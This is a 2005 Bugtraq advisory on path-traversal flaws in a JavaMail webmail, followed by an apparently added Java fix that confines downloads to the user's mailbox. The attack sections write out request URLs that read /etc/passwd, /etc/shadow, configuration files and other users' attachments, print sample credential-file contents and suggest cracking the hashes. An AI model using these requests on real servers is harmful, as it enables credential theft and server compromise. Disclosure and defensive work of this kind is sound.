Bugtraq mailing list archives
Javamail Multiple Information Disclosure Vulnerabilities
From: Ricky Latt <ygnboyz () gmail com>
Date: 25 May 2005 02:24:27 -0000
Javamail Multiple Information Disclosure Vulnerabilities
May 25, 2005
Yangon, Myanmar.

Vulnerable Systems:
* JavaMail API 1.3
* JavaMail API 1.2
* JavaMail API 1.1.3

Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows

ReadMessage.jsp fails to restrict access to other directories and files:

File Name:<%=mp.getFileName()%><br>
Type: <%=abc.getContent_Type()%><br>
Size: <%=abc.getMsgSize()/1024%>Kb<br>
<a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" target="_new"> download </a><br>
<%=abc.getFilePath() + "/" + abc.getFileName() %>"

This gives an attacker any file on the system, because the download link is built as getFilePath() + "/" + abc.getFileName(): the full server-side path of the attachment is handed to the client in the f parameter, and whatever path the client sends back is served.

1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin compromise
4. Download server information

1. Open specific mailbox attachment

When a user downloads a message attachment from the Javamail webmail, an attacker may notice the URL

http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user () example com/messageid123@user/filename.extension

The URL points into /var, so the attacker tries switching folders:

http://example.com/var/serviceprovider/web/mailboxesdir/user () example com/messageid123@user

but gets errors. Finally, reaching this URL

http://example.com/mailboxesdir/user () example com/

produces a directory listing of the attachments of user () example com. Even unauthorized users are able to view a specific mailbox's attachments; the attacker only needs to know the username to get the attachment listing:

http://example.com/mailboxesdir/user2 () example com/
http://example.com/mailboxesdir/user3 () example com/

2. Download configuration information of javamail

docdownloadfile.jsp redirects to the location of the file on the server, taken from the parameter f. The web browser actually receives the redirect to

http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user () example com/messageid123@user/filename.extension

This leads to web.xml, which gives the configuration information of javamail:

http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml

Download the source code of the jsp files:

http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp

3. Target machine Root/Admin compromise

In UNIX, /etc/passwd and /etc/shadow are important files. A little bit curious, type this in the web browser:

http://example.com/Download?/etc/passwd

An example of such a password file is:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh

Then crack the Unix password files with John the Ripper. John can be found practically anywhere; for example, go to altavista.com and run a search for 'john the ripper'.

http://example.com/Download?/etc/shadow

root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::

http://example.com/Download?/etc/group

/etc/group file:
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:

When the attacker gets the information of the root/admin user of the target server, any attack can follow. The attacker may do website defacement, database altering, stealing and more.

4. Download server information

http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog

And more can be done.

By Thet Aung Min Latt
thetaung () gmail com
http://thetaung.amyanmar.com
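The root cause of issues 2 to 4 above is that docdownloadfile.jsp and the Download servlet accept a filesystem path from the client (the f parameter, or the path after /Download?) and serve whatever it names. The following is an added example, not code from the advisory or from the JavaMail API, of how such a download endpoint resolves an attachment on the server side instead: the client sends only a message id and a file name, the user comes from the authenticated session, and the result is canonicalized and checked to lie inside that user's mailbox directory. The layout mailboxRoot/user/messageId/fileName and the class and method names are assumptions modelled on the paths in the advisory.

```java
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.regex.Pattern;

/*
 * Added example; not code from the advisory or from the JavaMail API.
 * Resolves an attachment download from (session user, message id, file name)
 * instead of from a client-supplied filesystem path such as the f= parameter
 * or the /Download?<path> form shown in the advisory.
 * Assumed layout (modelled on the advisory's URLs):
 *   <mailboxRoot>/<user>/<messageId>/<fileName>
 * with mailboxRoot kept outside the web application's document root, so the
 * mailbox tree is also never reachable as a static URL or directory listing.
 */
public final class AttachmentResolver {

    // Allow-list for the client-controlled components. Neither may contain a
    // path separator, so "../" cannot be expressed at all; the canonical-path
    // check in resolve() is a second, independent line of defence.
    private static final Pattern MESSAGE_ID = Pattern.compile("[A-Za-z0-9][A-Za-z0-9@._-]{0,199}");
    private static final Pattern FILE_NAME  = Pattern.compile("[A-Za-z0-9][A-Za-z0-9._ -]{0,254}");

    private final File mailboxRoot;

    public AttachmentResolver(File mailboxRoot) throws IOException {
        // Canonicalize once; everything served must stay below this directory.
        this.mailboxRoot = mailboxRoot.getCanonicalFile();
    }

    /**
     * @param user      the authenticated user taken from the HTTP session, never from a request parameter
     * @param messageId client-supplied message identifier (hypothetical "id" parameter)
     * @param fileName  client-supplied attachment name (hypothetical "name" parameter)
     */
    public File resolve(String user, String messageId, String fileName) throws IOException {
        if (user == null || !MESSAGE_ID.matcher(user).matches()) {
            throw new SecurityException("not authenticated");
        }
        if (messageId == null || !MESSAGE_ID.matcher(messageId).matches()) {
            throw new SecurityException("rejected message id");
        }
        if (fileName == null || !FILE_NAME.matcher(fileName).matches()) {
            throw new SecurityException("rejected file name");
        }

        File userDir = new File(mailboxRoot, user).getCanonicalFile();
        File candidate = new File(new File(userDir, messageId), fileName).getCanonicalFile();

        // getCanonicalFile() resolves ".." and symlinks, so an attachment that
        // is a symlink to /etc/shadow is rejected by this containment check too.
        if (!candidate.getPath().startsWith(userDir.getPath() + File.separator)) {
            throw new SecurityException("path escapes the user's mailbox");
        }
        if (!candidate.isFile()) {
            throw new FileNotFoundException(messageId + "/" + fileName);
        }
        return candidate;
    }

    // Demonstration with constructed inputs: the values an attacker would put
    // in the original f= parameter are refused before any file is opened.
    public static void main(String[] args) throws IOException {
        AttachmentResolver r = new AttachmentResolver(new File("/var/serviceprovider/mailboxes"));
        String[][] attempts = {
            {"messageid123@user", "filename.extension"},      // legitimate request
            {"..", "passwd"},                                  // traversal in message id
            {"messageid123@user", "../../../../etc/shadow"},   // traversal in file name
            {"messageid123@user", "/etc/passwd"},              // absolute path
        };
        for (String[] a : attempts) {
            try {
                System.out.println("allowed:  " + r.resolve("user@example.com", a[0], a[1]));
            } catch (SecurityException e) {
                System.out.println("rejected: " + a[0] + "/" + a[1] + " (" + e.getMessage() + ")");
            } catch (FileNotFoundException e) {
                System.out.println("no such attachment: " + e.getMessage());
            }
        }
    }
}
```

With this in place the ReadMessage.jsp link becomes docdownloadfile.jsp?id=...&name=... (hypothetical parameter names) and the server-side path never appears in a URL, so there is nothing for the Download servlet to echo back. For the directory listing in issue 1, keeping the mailbox tree outside the document root is the fix that matters; disabling the listings init-param of Tomcat's default servlet in conf/web.xml only hides the listing while the files themselves stay downloadable by name.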